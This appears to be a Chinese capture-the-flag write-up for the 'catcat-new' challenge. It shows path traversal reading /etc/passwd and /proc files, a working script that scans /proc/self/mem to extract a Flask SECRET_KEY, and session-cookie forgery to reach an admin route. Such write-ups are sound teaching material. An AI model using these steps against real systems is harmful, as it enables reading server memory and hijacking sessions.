catcat-new

题目来源

攻防世界　　NO.GFSJ1168

题解

dirsearch爆破目录，得到http://61.147.171.105:55027/admin，没有有用信息

点开主页的图片，观察URL，尝试读取/etc/passwd，成功，可以读取文件

读取/proc/self/cmdline文件，发现有app.py

/proc/self/cmdline 是一个特殊的文件，它提供了当前进程的命令行参数。例如在kali的shell中读取该文件，则会返回 “zsh"

在上一级路径中读取到app.py

将bytes转换为字符串以便于阅读，得到以下代码

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
__name__,
static_url_path='/',
static_folder='static'
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
flag = cat("/flag")
os.remove("/flag")

@app.route('/', methods=['GET'])
def index():
detailtxt = os.listdir('./details/')
cats_list = []
for i in detailtxt:
cats_list.append(i[:i.index('.')])

return render_template("index.html", cats_list=cats_list, cat=cat)



@app.route('/info', methods=["GET", 'POST'])
def info():
filename = "./details/" + request.args.get('file', "")
start = request.args.get('start', "0")
end = request.args.get('end', "0")
name = request.args.get('file', "")[:request.args.get('file', "").index('.')]

return render_template("detail.html", catname=name, info=cat(filename, start, end))



@app.route('/admin', methods=["GET"])
def admin_can_list_root():
if session.get('admin') == 1:
return flag
else:
session['admin'] = 0
return "NoNoNo"



if __name__ == '__main__':
app.run(host='0.0.0.0', debug=False, port=5637)

通过源码可以看到，我们需要伪造session，让session里admin的值为1，即可访问/admin，拿到flag。要伪造session，我们需要拿到SECRET_KEY，而SECRET_KEY可以从内存数据中获取。
/proc/self/mem中存储着当前进程在内存中的数据，但是该文件无法直接读取，我们需要先通过/proc/self/maps文件得到内存映射地址，然后读取内存数据文件/proc/self/mem。

将读到的maps中的数据保存到test.txt文件中，接下来使用脚本进行mem数据的读取。
以下脚本是网上找到的，我只是添加了一些注释

import re
import requests

maps=open('test.txt')       #test.txt存储/proc/self/maps的内容
b = maps.read()             
list = b.split('\\n')       #以换行符分行
for line in list:
    if 'rw' in line:            #寻找可读写的内存区域
        addr = re.search('([0-9a-f]+)-([0-9a-f]+)',line)
        #正则匹配地址,地址格式为十六进制数[0-9a-f],reserch会返回一个re.Match对象，用括号括起来是为了使用group()处理返回结果。
        #由于每一行会有两个地址，表示一个内存区域，因此addr会有group(1)和group(2)
        start = int(addr.group(1),16)  #将十六进制字符转化为十进制数，为了符合start参数格式参考链接
        end = int(addr.group(2),16)    #将十六进制字符转化为十进制数，为了符合end参数格式
        #这里start和end参数是python读取/proc/self/mem需要用到的参数
        print(start,end)
        url = f"http://61.147.171.105:55174//info?file=../../../proc/self/mem&start={start}&end={end}"
        #使用start和end参数读取mem
        response = requests.get(url)
        secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", response.text)  #uuid4()生成的字符串除去-符号后为固定的32字节（128bit），*abcdefgh为题目源码生成uuid后添加的字符串
        if secret_key:
            print(secret_key)
            break

在app.py中可以看到info路由中除了file参数，还有start和end参数，这两个参数就是用来传递读取mem数据时内存区域对应的地址。
运行脚本得到secret_key：8fe482ecf92b4639801ca7312cf5f73a*abcdefgh

使用工具flask_session_cookie_manager伪造session。项目地址：https://github.com/noraj/flask-session-cookie-manager
伪造ssesion需要一个正确的session，将其解密，更改数据后再进行加密

解密

python flask_session_cookie_manager3.py decode -s “secret_key” -c “session”

加密

python flask_session_cookie_manager3.py encode -s “secret_key” -t “data”

获取session值：eyJhZG1pbiI6MH0.Zl1XPA.8KjQ87LqcrnMb34jRHFIB_il4Y0

伪造session，根据app.py将数据中admin的值改为1

接下来使用伪造的session代替原来的session，访问路由admin，得到flag